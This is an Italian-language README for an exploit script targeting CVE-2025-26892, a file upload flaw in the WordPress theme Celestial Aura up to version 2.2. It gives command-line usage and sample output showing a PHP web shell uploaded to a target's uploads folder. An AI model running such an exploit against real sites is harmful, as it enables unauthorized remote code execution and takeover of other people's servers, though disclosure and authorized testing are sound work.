
Il tema WordPress Celestial Aura <= 2.2 è vulnerabile al Caricamento Arbitrario di File.
Una vulnerabilità di Caricamento File Senza Restrizioni è presente nel tema WordPress Celestial Aura (sviluppato da dkszone) fino alla versione 2.2.
Un utente autenticato con privilegi bassi può caricare file PHP arbitrari tramite il pannello di amministrazione del tema, portando potenzialmente a Esecuzione di Codice Remota (RCE).
Celestial Aurawp-admin/admin.php?page=CA-settingsValutazione Patchstack CNA:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:Husage: CVE-2025-26892.py [-h] --url URL --username USERNAME --password PASSWORD
CVE-2025-26892 | WordPress Celestial Aura Theme <= 2.2 Arbitrary File Upload (Authenticated)
options:
-h, --help Show this help message and exit
--url, -u URL Target WordPress site (e.g., http://127.0.0.1/wordpress)
--username, -un WordPress username (any authenticated user)
--password, -p WordPress password
Lo script effettua l'accesso con le credenziali fornite, carica una shell PHP dannosa (nxploit.php) tramite le impostazioni vulnerabili del tema e stampa l'URL diretto alla shell caricata.
[+] Exploit sent successfully.
[+] Form Fields Sent:
- CA_hdrimage: yes
...
- CA_save: Save changes
[+] Shell Location:
http://target-site/wp-content/uploads/nxploit.php
Exploit By: Khaled_alenazi (Nxploited)
Questo progetto è destinato esclusivamente a scopi educativi e di test di penetrazione autorizzati.
Qualsiasi uso improprio di questo strumento non è responsabilità dell'autore.